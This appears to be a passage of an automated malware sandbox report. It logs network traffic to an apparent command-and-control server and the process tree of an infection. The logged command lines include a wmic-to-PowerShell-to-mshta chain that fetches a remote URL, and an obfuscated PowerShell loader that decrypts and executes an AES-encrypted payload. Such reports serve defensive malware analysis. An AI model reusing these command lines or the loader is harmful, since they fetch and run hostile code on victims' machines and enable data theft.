                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: a8 ca 08 f4 1f b5 61 7b 13 87 06 a3 ea 88 24 c8 f4 87 97 5b cb f0 53 9c 7c 31 e5 bd 59 4a 33 96 c9 dc 1a 4a f8 f4 f8 83 2a 57 d8 2a 64 1b 04 fc 7d f1 12 d7 fb 4f 1b 96 23 0a be 0a 42 8e ad 9e f1 9d 40 c6 3f b1 ae eb 01 5d 17 58 2b 3d 5f e0 2d 15 f0 65 df a0 6f 8e e8 fe a1 c0 66 c0 36 67 ee 92 1c ab 52 3c f6 93 77 da 3e 23 e8 86 47 93 e9 ab 9d bc 95 ce 46 ff 81 4b 20 83 9c 28 4c 03 aa 1f c2 6f 6b f6 a9 ad 93 98 83 dc 80 47 7f 96 8a d6 aa 83 fe f6 f5 19 7a 97 96 ab 1a 6a 04 b5 75 6d f6 f5 ea 66 90 ed d0 f9 37 93 c2 c5 52 b2 80 35 0f dc a9 96 43 17 f3 ba 8e 4a f6 89 d4 d6 f0 68 7b f9 59 e5 2b 5b ab 60 99 a3 8f c7 4e 89 f5 44 b6 68 02 1f 1d b2 85 0c ff c9 c1 54 03 75 20 19 23 bb a9 80 00 ca a4 78 6f 14 af 57 fd 5b 30 51 7b fd c1 75 da 2d f5 e4 ec 4b 73 49 02
                                                                                                                                                                                                                                              Data Ascii: a{$[S|1YJ3J*W*d}O#B@?]X+=_-eof6gR<w>#GFK (LokGzjumf7R5CJh{Y+[`NDhTu #xoW[0Q{u-KsI
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: bd 1e f9 2a f4 7a f7 c4 be d0 a9 28 8d 33 95 db 8d fb da 0c e1 be eb a5 17 d7 3f 1c 89 13 ad ba fd dd 88 b2 4c 1b f9 41 1e d5 08 cd b9 bd 22 fc 64 9c 63 82 dc 91 2a 47 cd 56 f5 19 36 be b2 e4 d8 cc 1e 25 43 3f 5a 8b 3e 3c c3 31 0e 6f 06 9c 86 f1 cc fd b9 7a d1 12 4c 43 23 3f 5e 6c 93 a7 f3 1e 7d a5 ee 5f dc 97 5b 23 64 e4 26 05 e8 4e d9 ed 4d 8f fd 3b 6f 25 99 a6 2d a3 27 aa 34 be 53 7d 2f 92 35 75 86 5e d1 96 1f 0b f8 c4 50 96 cf 50 a5 e3 68 c7 42 68 ba 16 af 7c f4 86 64 d3 db b6 d9 d7 86 77 af 9c 1f 32 ee d3 f8 3c b3 7d cc e9 46 f0 8e 3a 63 9c 16 43 d3 6e 5a 45 07 03 7a c1 5d 19 e0 42 36 8f d1 15 99 d3 a8 c6 21 4e 88 ba 59 00 5f 30 04 c4 8b 04 dd 17 da 2f 5e a4 8e f8 ff fc d6 d8 2a fd 25 9e d1 3c d2 b3 ea a2 63 ee df 57 60 b8 dd 69 85 45 8d 1f e5 41 af
                                                                                                                                                                                                                                              Data Ascii: *z(3?LA"dc*GV6%C?Z><1ozLC#?^l}_[#d&NM;o%-'4S}/5u^PPhBh|dw2<}F:cCnZEz]B6!NY_0/^*%<cW`iEA
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 88 9c 72 9c 31 9c 4d 4f 5c d0 20 a6 a1 c4 3c d0 df f6 e7 57 ae 60 9f a2 97 47 18 40 e1 b9 73 83 81 e3 2c 36 69 30 6c d2 62 ba 3c 63 a7 34 72 c6 66 9a f5 8c 76 c4 61 94 3d fc 96 31 3a ea b7 17 93 27 5d 85 65 05 8b 6f 03 39 bb 3f 99 1a 9a 13 3f 91 79 0e 3f e6 29 76 3d c5 67 5f 45 17 75 10 01 11 0c 1e bc b6 3d d0 88 2c 61 a3 76 25 70 bd 85 83 53 66 87 bc 92 49 db 39 9f 08 ed 74 b4 52 35 a4 9a 46 87 dd 76 77 9f c3 89 9b 8b 55 f0 a8 c1 a8 63 40 40 f6 b6 10 5f 0b 7f 8c ca f0 bc 96 59 59 34 0f 6c 89 65 87 e9 bf b5 26 09 66 c0 a9 3a 93 ba b3 3d ce 2e ac f8 32 bc 66 38 6e 53 b9 eb 00 bd 2f a7 85 c0 e8 c7 14 df cf 65 1c fa f3 bd b0 b6 e2 64 ac 88 eb a0 20 84 39 4c 62 01 a7 69 b2 d9 43 9b 6e a8 d6 00 75 61 ce a5 9c 9d 40 0e 5c 29 80 56 c1 76 3d 5c ea b0 90 9d 90 3f
                                                                                                                                                                                                                                              Data Ascii: r1MO\ <W`G@s,6i0lb<c4rfva=1:']eo9??y?)v=g_Eu=,av%pSfI9tR5FvwUc@@_YY4le&f:=.2f8nS/ed 9LbiCnua@\)Vv=\?
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: fa 6b f4 8e 51 b1 e2 de 4d 96 13 84 15 cd 84 9c d6 a0 85 5f 29 ad d0 48 e0 68 81 c7 64 f7 8d 53 e2 e4 7c d9 49 b0 f2 d9 f1 86 5f ab 1f 61 2b f9 da 9a 64 85 c1 2f 30 e2 cf 6f 2e 64 5d bd a5 9c fd 5d 03 eb b3 d5 7b 6d bb b0 d8 2c 7b 8a 7e d6 17 d9 00 5b bb 8a 9b 9e ce 0f 52 77 ed 0f 25 4d 9e e4 c7 2a df ec 4f 00 cc c6 65 cf 89 a2 f1 ef 7f 19 c3 c5 64 39 7a d9 70 2c f9 94 96 9c 84 f1 d0 92 50 7e 0b 4a 7b 9f b7 12 f8 26 f2 3e 4b b3 d0 6f c9 72 b5 62 77 5a c1 40 b8 38 2f 13 e0 9d fe 72 ea 3c df 3d 58 a2 14 f4 9d 7d a9 d5 dc 12 76 7d bb f5 4c e9 aa a6 60 14 ad 7e 71 74 14 9d f2 22 ca bb fb 55 1b 1b e6 56 45 2d 5d ce d8 7d fd 29 a5 ac 7b cf 06 2f 70 98 2e a1 b2 08 67 2f 7c 09 8d d9 f1 1b da ba e0 fb d2 7c 30 7a cd 26 c3 3d 12 7a 72 5f 7f a7 72 54 3a 9c 20 22 d4
                                                                                                                                                                                                                                              Data Ascii: kQM_)HhdS|I_a+d/0o.d]]{m,{~[Rw%M*Oed9zp,P~J{&>KorbwZ@8/r<=X}v}L`~qt"UVE-]}){/p.g/||0z&=zr_rT: "
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 82 94 59 4d be 5e e1 ab 73 5a 03 8b a9 bb b1 f7 47 f7 a2 87 4f 8f 26 49 78 ee 44 23 d2 87 bc f2 bf c6 d5 76 32 1c a1 94 00 89 59 d5 64 3b 59 6a fb dc bb e9 8a 3b d1 e6 31 78 11 82 9b ff 6c c0 df dc 1c 57 07 f4 cd 8c 42 ff ac 9a 80 33 1e 3c 09 02 9f 73 f3 be 4e 43 06 b1 11 75 65 5d 72 8e 9c b8 f0 0e 63 20 88 59 7a fe 00 6c 5e 15 a5 db bd 24 89 8c 8a 2e f1 ed 74 6a 17 ca d8 0f ea b7 ed 07 fc 6b 58 ee df 86 8d 71 d0 18 83 ac 44 18 95 eb 66 8c 99 d0 5f 6f c7 ea 3f 33 a2 55 b0 93 d5 d1 ac 23 24 9a 66 a8 db 3c e5 fe 5b 7c 85 f6 5f 91 aa e5 56 8a ea fa 6a 43 bf 70 f7 2d 34 ab 8b cf 2f cc 42 85 d3 cb 98 bf 5a 81 bb 54 3c bf 34 10 76 98 22 26 af bd 34 e6 e6 cc 2c 76 1b b7 0d 24 5a 7b d2 7d aa 2a 8e 17 f9 9f 65 5f c6 b1 01 63 ce cd 8e f9 b2 2a 58 3c 75 a2 7b e4 56
                                                                                                                                                                                                                                              Data Ascii: YM^sZGO&IxD#v2Yd;Yj;1xlWB3<sNCue]rc Yzl^$.tjkXqDf_o?3U#$f<[|_VjCp-4/BZT<4v"&4,v$Z{}*e_c*X<u{V
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 7d 62 6e d5 27 d5 66 87 2b 7b b6 62 98 ad 99 04 03 8f 5b c0 f3 7c 4c 4f a8 d7 b2 5c a2 7f cc b6 ab 14 ca 9c 5f 78 2c e1 d6 8a f7 d7 bf 92 e0 9f 35 6c 39 d5 8f 78 33 b3 8c 00 fb f8 a4 00 e1 27 64 0a e2 b3 5d fb 3b 15 7f f2 f3 02 75 15 63 b0 f6 20 13 27 d5 7b 1f 90 bf e6 f0 49 23 82 84 88 65 1d 86 3a 19 6c 95 0a fd c5 63 1e 82 fb 96 0a 3e d8 19 94 1c b0 2d 97 74 0c 36 e4 9e b8 f9 c2 0d 85 21 51 89 24 3d 1a 4f 0e 9b 82 18 a2 ab a2 c8 cb 22 41 ea af 49 05 49 ee 9c 0b 9d 71 48 ee 1e c6 82 5c 10 22 32 03 8a 2c 0e 94 18 fb b3 d8 87 68 f9 f4 dc e4 de 5a 8c df 11 61 03 c9 0c 91 ba 27 97 cb 6b c3 f9 a8 6e 6b 17 58 b5 f8 8d d3 c1 52 cf 37 35 e4 d1 e7 b3 aa fe 92 62 63 a3 08 31 b1 51 00 eb 42 4c 9b bc f5 06 2e 62 f7 ca f6 85 63 13 2a 30 30 b1 32 6f 44 5e e2 40 5a 11
                                                                                                                                                                                                                                              Data Ascii: }bn'f+{b[|LO\_x,5l9x3'd];uc '{I#e:lc>-t6!Q$=O"AIIqH\"2,hZa'knkXR75bc1QBL.bc*002oD^@Z
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 8a ad 51 9e 85 27 1d 63 7f a3 46 e7 bb 66 71 b2 e0 fb 9c f4 d4 8e 3c 63 b8 9f a5 85 46 51 32 3f b9 31 a8 40 e4 c1 1d bd 0b 8a 87 59 aa c6 15 0f b5 90 9f be 6d 39 13 01 89 78 60 1a 06 54 7a 43 11 f7 5f 58 4d 05 cf 0e 6c 69 2a fa b6 a2 a6 d8 be fb 80 92 12 02 fd 06 8e 5d 13 e0 f6 5c 38 57 7d 53 58 90 8b 2d 32 38 a6 de 26 2c 55 02 57 ab bd 14 c8 d8 97 a8 48 18 d5 2b 46 7d da 2e 75 e5 05 41 41 01 d8 79 d3 0d 85 93 d4 bc e2 d5 f9 bc 44 de 97 bb 9b 90 49 b4 37 d1 29 17 e1 ab 9f 66 78 bb 3c f8 7d c5 39 53 35 24 76 4a e4 76 c4 01 7a 98 8e c4 ea ab 39 93 dc 68 ad a1 c8 32 a7 25 59 1b 8b a2 a6 ec 1a 1f af 85 2a 80 12 40 0d ac 8c d4 cc 45 f8 fe 4e 59 39 62 14 fb ba 83 cf 32 91 e2 62 06 22 ad 28 52 fc 5c f4 ea 1e 46 bd 42 a6 26 32 58 af f9 0a 02 63 54 60 82 c2 57 ca
                                                                                                                                                                                                                                              Data Ascii: Q'cFfq<cFQ2?1@Ym9x`TzC_XMli*]\8W}SX-28&,UWH+F}.uAAyDI7)fx<}9S5$vJvz9h2%Y*@ENY9b2b"(R\FB&2XcT`W
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 35 10 2d 46 8b 07 6a b9 c9 65 0b 20 f7 f3 c1 56 ee 0d 8f 46 a1 ed 69 4e eb b3 8f ce 05 6d 21 a5 2a 97 fc b9 a2 b9 fd 45 6c 7c 7c 94 f4 d9 27 7d 7e a7 0c 7e 98 3f 85 c4 44 c5 2b 83 a5 1f fc 12 13 44 4b d4 c0 7e bc 50 11 95 41 bf 3e fd 24 9a 9a f7 de a1 31 c1 97 d3 c4 2e ed 5f 48 64 fa 7b 5c 93 ca a1 85 32 8b b2 d6 56 7f bc df bf 3d 77 a4 80 c9 ee 11 02 4d 57 c0 6d 24 9c 96 2f 04 ba 85 57 9c 1f 73 8c c6 be 45 bd 4c d3 ad d5 05 42 55 44 14 e8 2d 74 e7 59 54 32 9a 2e d1 3f 13 18 c0 ad d9 1f 79 64 b7 30 90 ad 49 b9 d2 79 3e dc d5 6f e7 9d 9f 50 f8 6d a1 04 29 60 7c ff b1 98 bc cd 36 40 38 9d 70 19 6f e9 28 4b cd 28 75 ff b2 b5 ec c4 71 fc bd 98 cc a5 ab ba 30 f5 5d 53 71 11 b7 0f 6f 05 d4 eb 22 48 6c cd 2f 15 b4 c1 c1 42 b2 18 3f 40 08 3d e9 a5 56 6f d1 bf 14
                                                                                                                                                                                                                                              Data Ascii: 5-Fje VFiNm!*El||'}~~?D+DK~PA>$1._Hd{\2V=wMWm$/WsELBUD-tYT2.?yd0Iy>oPm)`|6@8po(K(uq0]Sqo"Hl/B?@=Vo
                                                                                                                                                                                                                                              2024-12-21 14:00:17 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=qajlt1ioebe1gg2fenn1vepl14; expires=Wed, 16 Apr 2025 07:46:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr4CQNrQyhezgrrbKX9wnUV9cGLvQr8sV6Z4Hj1S543RfnA4orwpM8UZixOzMZGM5QSU6Ow1ZNJ6L0R17MSegSbBhr3ovFSbfdP7DzalsjhN%2FEMIbjjiCjy%2FC2NG5ngiAdGorw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f5865b05b8b1881-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1559&rtt_var=601&sent=213&recv=423&lost=0&retrans=0&sent_bytes=2842&recv_bytes=405711&delivery_rate=1798029&cwnd=238&unsent_bytes=0&cid=1de8169f1e0da491&ts=3701&x=0"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.549871104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:18 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 77
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:18 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 42 31 35 67 31 2d 2d 26 6a 3d 26 68 77 69 64 3d 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=AB15g1--&j=&hwid=E86646F8C7B0B95CAC8923850305D13E
                                                                                                                                                                                                                                              2024-12-21 14:00:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=6u5ee0nn10bojefcsjda4po31b; expires=Wed, 16 Apr 2025 07:46:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9J9eEK7aYI7iJArywP65FZ7gDIOeyLdzBHtppjdlpTs0n9%2B5dro2qRGVGd%2BIhNNylmbOF0M8w8sLYgHHsePK497Feh9GzNs3xLZKySBdVO9xt4FO0eDuXBdPU%2FvlzirXCWCdKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f5865d02b990fa8-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=978&delivery_rate=1941489&cwnd=252&unsent_bytes=0&cid=dde63f602ff14591&ts=864&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:19 UTC54INData Raw: 33 30 0d 0a 78 38 7a 4b 32 70 44 32 6c 48 6a 6b 79 51 68 46 4c 70 43 74 51 61 57 45 30 61 4c 66 7a 71 6b 79 57 6b 76 4c 53 35 6d 35 7a 55 36 63 6b 51 3d 3d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 30x8zK2pD2lHjkyQhFLpCtQaWE0aLfzqkyWkvLS5m5zU6ckQ==
                                                                                                                                                                                                                                              2024-12-21 14:00:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:08:58:56
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                                                                                                                                                                                                                                              Imagebase:0x7ff64d6b0000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:08:58:56
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:08:58:57
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:08:58:57
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:08:58:59
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:08:59:02
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:08:59:03
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:08:59:03
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

